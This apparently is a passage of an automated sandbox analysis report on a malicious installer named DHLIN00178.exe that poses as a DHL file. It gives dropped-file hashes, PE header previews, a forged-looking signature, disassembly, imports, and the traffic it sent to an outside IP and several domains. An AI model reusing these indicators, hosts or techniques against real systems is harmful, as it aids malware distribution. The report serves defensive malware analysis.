                                                                    SHA-512:BC1DCDDE074150616DED7EAACC3FC44BDD2487EB5E550172F5EA46432AA76F19443A9FD6CEF61577B7803C1B083FFCBCEAF9ADC3114A97B547A78C2654F757E3
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................&"....."....................\d.............................P......z.....`... .................................................X....0..................x....@.............................. ..(.......................P............................text...8!......."..................`.P`.data........@.......&..............@.`..rdata...^...P...`...(..............@.`@.pdata..............................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..X...........................@.0..CRT....X...........................@.@..tls....h.... ......................@.`..rsrc........0......................@.0..reloc.......@......................@.0B................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Stingily\Nebularise\stormagasiners\maintenanceservice2.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):227256
                                                                    Entropy (8bit):6.388677533277947
                                                                    Encrypted:false
                                                                    SSDEEP:6144:ue/rKQgYva3o4vj272BNvIJuQlf2qIHL2:uYrK4a3PvKw7ufg2
                                                                    MD5:49A2E97304EF8E044EEBD7ACCAD37E11
                                                                    SHA1:7D0F26591C8BD4CAB1718E323B65706CBEA5DE7A
                                                                    SHA-256:83EAFBF165642C563CD468D12BC85E3A9BAEDE084E5B18F99466E071149FD15F
                                                                    SHA-512:AC206C5EF6F373A0005902D09110A95A7F5FB4F524653D30C3A65182717272FE244694A6698D40884BEA243B2CA00D7741CED796DF7AE8C633F513B8C6FCD6C8
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...J..b.........."......:.....................@....................................Y.....`..................................................................`..h....X..........................................(....P..............(...h............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data....!...0......................@....pdata..h....`.......*..............@..@.00cfg...............D..............@..@.tls.................F..............@....rsrc................H..............@..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\AeL-0b1QRQ

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\cscript.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 5, database pages 59, cookie 0x4f, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):122880
                                                                    Entropy (8bit):1.1305327154874678
                                                                    Encrypted:false
                                                                    SSDEEP:192:oLt4nKTjebGAUJp/XH9euJDvphC+KRmquPWSTVumQ6:it4nsJp/39RDhw+KRmqu+cVumQ
                                                                    MD5:D331C900DDE8ACB523C51D9448205C0A
                                                                    SHA1:BDB3366F54876E78F76A6244EDA7A4C302FEB91D
                                                                    SHA-256:F199798DF1C37E3A8F6FFF1E208F083CF687F5C6A220DCAD42BB68F2120181CD
                                                                    SHA-512:415E4F4F26D4F861063676EA786C2941DB8DB7E248E32D84595BC7D531CE19669AFDCB447BC18B0B723839984CD15269FF6E89EBCD168D8EBD0EC7AF86CC92E7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......;...........O......................................................O}...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\nsj54D2.tmp\System.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\DHLIN00178.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):11776
                                                                    Entropy (8bit):5.854901984552606
                                                                    Encrypted:false
                                                                    SSDEEP:192:qPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4U:F7VpNo8gmOyRsVc4
                                                                    MD5:0063D48AFE5A0CDC02833145667B6641
                                                                    SHA1:E7EB614805D183ECB1127C62DECB1A6BE1B4F7A8
                                                                    SHA-256:AC9DFE3B35EA4B8932536ED7406C29A432976B685CC5322F94EF93DF920FEDE7
                                                                    SHA-512:71CBBCAEB345E09306E368717EA0503FE8DF485BE2E95200FEBC61BCD8BA74FB4211CD263C232F148C0123F6C6F2E3FD4EA20BDECC4070F5208C35C6920240F0
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L......]...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Entropy (8bit):7.477730016942703
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:DHLIN00178.exe
                                                                    File size:888192
                                                                    MD5:66fdf2df4fc8601124df76c284f797e1
                                                                    SHA1:88031f2f9bfbf3eb0b069c68fd4ed4ee288daf9f
                                                                    SHA256:e07a149d14fc37367e7331342d07dc45aec9ef7bbce780ea636c5d04f6c26f3f
                                                                    SHA512:a1fc53925d4fd04a81d2d7dc8bb26ed15fef14e9cd38945fbba55ef7b67a13b67c9527ed7c5388f9ed9013c287df67f343248bb4261838f389d34f42959c3720
                                                                    SSDEEP:12288:AwFjJnKlHcG+glWs89TbTjb8E5UcKcZnY4UKwp7hVOZCbgjvwhaD:A6jklHcGtlF89TbfccUNEZCbgjV
                                                                    TLSH:4715CFD7B845528CE9B99EB3712B1C2213701FBA662C104D76CC329D09FD1627EDE86E
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L......].................`..........52.......p....@

                                                                    File Icon

                                                                    Icon Hash:6e8d166f696a6661

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x403235
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:true
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x5DF6D4E3 [Mon Dec 16 00:50:43 2019 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:e9c0657252137ac61c1eeeba4c021000

                                                                    Authenticode Signature

                                                                    Signature Valid:false
                                                                    Signature Issuer:E=Misbehadden@Anstdsstenenes.Sta, OU="Seksdageslb Tredjebehandles ", O=Konfirmeres, L=Bondues, S=Hauts-de-France, C=FR
                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                    Error Number:-2146762487
                                                                    Not Before, Not After
                                                                    • 27/05/2022 07:04:34 26/05/2025 07:04:34
                                                                    Subject Chain
                                                                    • E=Misbehadden@Anstdsstenenes.Sta, OU="Seksdageslb Tredjebehandles ", O=Konfirmeres, L=Bondues, S=Hauts-de-France, C=FR
                                                                    Version:3
                                                                    Thumbprint MD5:EF5809104A07E21FDB714DE7D3F4CB3B
                                                                    Thumbprint SHA-1:E5B83F0AF141BAF75894E4585A5133459235BDBF
                                                                    Thumbprint SHA-256:AC8EC8BCA9EDDE54EDCCFD81C53BCAB60DEB5C8F53E2C46EB232990CA73252D7
                                                                    Serial:7D95432F108C131FEDA31C4FE788119FC24ED14C

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    sub esp, 00000184h
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    xor ebx, ebx
                                                                    push 00008001h
                                                                    mov dword ptr [esp+18h], ebx
                                                                    mov dword ptr [esp+10h], 00409198h
                                                                    mov dword ptr [esp+20h], ebx
                                                                    mov byte ptr [esp+14h], 00000020h
                                                                    call dword ptr [004070A0h]
                                                                    call dword ptr [0040709Ch]
                                                                    and eax, BFFFFFFFh
                                                                    cmp ax, 00000006h
                                                                    mov dword ptr [0042370Ch], eax
                                                                    je 00007FDC79015AB3h
                                                                    push ebx
                                                                    call 00007FDC79018B9Bh
                                                                    cmp eax, ebx
                                                                    je 00007FDC79015AA9h
                                                                    push 00000C00h
                                                                    call eax
                                                                    mov esi, 00407298h
                                                                    push esi
                                                                    call 00007FDC79018B17h
                                                                    push esi
                                                                    call dword ptr [00407098h]
                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                    cmp byte ptr [esi], bl
                                                                    jne 00007FDC79015A8Dh
                                                                    push 0000000Ah
                                                                    call 00007FDC79018B6Fh
                                                                    push 00000008h
                                                                    call 00007FDC79018B68h
                                                                    push 00000006h
                                                                    mov dword ptr [00423704h], eax
                                                                    call 00007FDC79018B5Ch
                                                                    cmp eax, ebx
                                                                    je 00007FDC79015AB1h
                                                                    push 0000001Eh
                                                                    call eax
                                                                    test eax, eax
                                                                    je 00007FDC79015AA9h
                                                                    or byte ptr [0042370Fh], 00000040h
                                                                    push ebp
                                                                    call dword ptr [00407040h]
                                                                    push ebx
                                                                    call dword ptr [00407284h]
                                                                    mov dword ptr [004237D8h], eax
                                                                    push ebx
                                                                    lea eax, dword ptr [esp+38h]
                                                                    push 00000160h
                                                                    push eax
                                                                    push ebx
                                                                    push 0041ECC8h
                                                                    call dword ptr [00407178h]
                                                                    push 00409188h

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x74300xa0.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x360000x34260.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xd6b180x2268
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x294.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x5f7d0x6000False0.6680094401041666data6.466064816043304IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x70000x123e0x1400False0.4275390625data4.989734782278587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x90000x1a8180x400False0.638671875data5.130817636118804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .ndata0x240000x120000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x360000x342600x34400False0.20456414473684212data4.299804646716883IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_ICON0x362080x33828Device independent bitmap graphic, 199 x 512 x 32, image size 203776, resolution 3779 x 3779 px/mEnglishUnited States
                                                                    RT_DIALOG0x69a300x100dataEnglishUnited States
                                                                    RT_DIALOG0x69b300x11cdataEnglishUnited States
                                                                    RT_DIALOG0x69c500xc4dataEnglishUnited States
                                                                    RT_DIALOG0x69d180x60dataEnglishUnited States
                                                                    RT_GROUP_ICON0x69d780x14dataEnglishUnited States
                                                                    RT_VERSION0x69d900x190dataEnglishUnited States
                                                                    RT_MANIFEST0x69f200x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                                    Imports

                                                                    DLLImport
                                                                    KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetFileAttributesA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                                                    USER32.dllGetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
                                                                    GDI32.dllSelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
                                                                    SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                                                    ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States

                                                                    Network Behavior

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Mar 17, 2023 21:37:33.052336931 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.220213890 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.220441103 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.221458912 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.396615028 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.396702051 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.396770000 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.396832943 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.396862984 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.396863937 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.396897078 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.396944046 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.396960974 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.397025108 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.397063017 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.397063017 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.397092104 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.397133112 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.397156000 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.397221088 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.397255898 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.397316933 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.397316933 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.397500038 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.564837933 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.564940929 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.565017939 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.565088034 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.565100908 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.565160036 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.565177917 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.565223932 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.565253973 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.565275908 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.565332890 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.565390110 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.565407038 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.565454006 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.565483093 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.565517902 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.565556049 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.565587997 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.565656900 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.565742970 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.565743923 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.565772057 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.565897942 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.565938950 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.566005945 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.566019058 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.566067934 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.566148043 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.566226959 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.566251040 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.566318035 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.566324949 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.566396952 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.566452026 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.566471100 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.566515923 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.566545963 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.566577911 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.566647053 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.566783905 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.734282017 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.734411955 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.734515905 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.734520912 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.734611034 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.734636068 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.734750032 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.734767914 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.734818935 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.734863043 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.734958887 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.734982014 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.735025883 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.735101938 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.735182047 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.735220909 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.735250950 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.735327959 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.735425949 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.735445023 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.735476971 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.735563993 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.735634089 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.735665083 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.735718012 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.735757113 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.735863924 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.735867023 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.735964060 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.736005068 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.736057997 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.736068964 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.736174107 CET8049837162.213.255.18192.168.11.20
                                                                    Mar 17, 2023 21:37:33.736182928 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.736249924 CET4983780192.168.11.20162.213.255.18
                                                                    Mar 17, 2023 21:37:33.736272097 CET8049837162.213.255.18192.168.11.20

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Mar 17, 2023 21:37:32.723170042 CET5803053192.168.11.201.1.1.1
                                                                    Mar 17, 2023 21:37:33.046544075 CET53580301.1.1.1192.168.11.20
                                                                    Mar 17, 2023 21:39:18.686295033 CET6258653192.168.11.201.1.1.1
                                                                    Mar 17, 2023 21:39:18.725651026 CET53625861.1.1.1192.168.11.20
                                                                    Mar 17, 2023 21:39:33.868172884 CET5889753192.168.11.201.1.1.1
                                                                    Mar 17, 2023 21:39:34.203830957 CET53588971.1.1.1192.168.11.20
                                                                    Mar 17, 2023 21:39:46.897708893 CET5520253192.168.11.201.1.1.1
                                                                    Mar 17, 2023 21:39:46.928004026 CET53552021.1.1.1192.168.11.20
                                                                    Mar 17, 2023 21:39:59.629028082 CET5927953192.168.11.201.1.1.1
                                                                    Mar 17, 2023 21:40:00.230015993 CET53592791.1.1.1192.168.11.20
                                                                    Mar 17, 2023 21:40:14.046832085 CET6080553192.168.11.201.1.1.1
                                                                    Mar 17, 2023 21:40:14.119550943 CET53608051.1.1.1192.168.11.20
                                                                    Mar 17, 2023 21:40:26.966200113 CET6061353192.168.11.201.1.1.1
                                                                    Mar 17, 2023 21:40:26.986928940 CET53606131.1.1.1192.168.11.20
                                                                    Mar 17, 2023 21:40:39.635067940 CET5847253192.168.11.201.1.1.1
                                                                    Mar 17, 2023 21:40:39.985469103 CET53584721.1.1.1192.168.11.20
                                                                    Mar 17, 2023 21:40:53.178683996 CET4929653192.168.11.201.1.1.1
                                                                    Mar 17, 2023 21:40:53.192972898 CET53492961.1.1.1192.168.11.20
                                                                    Mar 17, 2023 21:41:06.707278013 CET6153853192.168.11.201.1.1.1
                                                                    Mar 17, 2023 21:41:07.026993990 CET53615381.1.1.1192.168.11.20
                                                                    Mar 17, 2023 21:41:21.188827991 CET5322253192.168.11.201.1.1.1
                                                                    Mar 17, 2023 21:41:21.207340002 CET53532221.1.1.1192.168.11.20
                                                                    Mar 17, 2023 21:41:35.545300961 CET5057053192.168.11.201.1.1.1
                                                                    Mar 17, 2023 21:41:36.560158968 CET5057053192.168.11.209.9.9.9
                                                                    Mar 17, 2023 21:41:37.020494938 CET53505701.1.1.1192.168.11.20
                                                                    Mar 17, 2023 21:41:37.353796959 CET53505709.9.9.9192.168.11.20
                                                                    Mar 17, 2023 21:41:50.884869099 CET6311453192.168.11.201.1.1.1
                                                                    Mar 17, 2023 21:41:51.192102909 CET53631141.1.1.1192.168.11.20
                                                                    Mar 17, 2023 21:42:04.725537062 CET5245653192.168.11.201.1.1.1
                                                                    Mar 17, 2023 21:42:05.741060972 CET5245653192.168.11.209.9.9.9
                                                                    Mar 17, 2023 21:42:06.574141026 CET53524561.1.1.1192.168.11.20
                                                                    Mar 17, 2023 21:42:06.817251921 CET53524569.9.9.9192.168.11.20
                                                                    Mar 17, 2023 21:42:21.425585985 CET6515153192.168.11.201.1.1.1
                                                                    Mar 17, 2023 21:42:21.853430033 CET53651511.1.1.1192.168.11.20
                                                                    Mar 17, 2023 21:42:35.609678030 CET5407253192.168.11.201.1.1.1
                                                                    Mar 17, 2023 21:42:35.920783997 CET53540721.1.1.1192.168.11.20
                                                                    Mar 17, 2023 21:42:48.576221943 CET6358153192.168.11.201.1.1.1
                                                                    Mar 17, 2023 21:42:48.607541084 CET53635811.1.1.1192.168.11.20

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Mar 17, 2023 21:37:32.723170042 CET192.168.11.201.1.1.10x7fcbStandard query (0)machupichuturismo.comA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:39:18.686295033 CET192.168.11.201.1.1.10xc897Standard query (0)www.sandyhillsagritourism.comA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:39:33.868172884 CET192.168.11.201.1.1.10xb713Standard query (0)www.sem-jobs.comA (IP address)IN (0x0001)false
                                                                    Mar 17, 2023 21:39:46.897708893 CET192.168.11.201.1.1.10x2334Standard query (0)www.casinoenligne-france.infoA (IP address)IN (0x0001)false
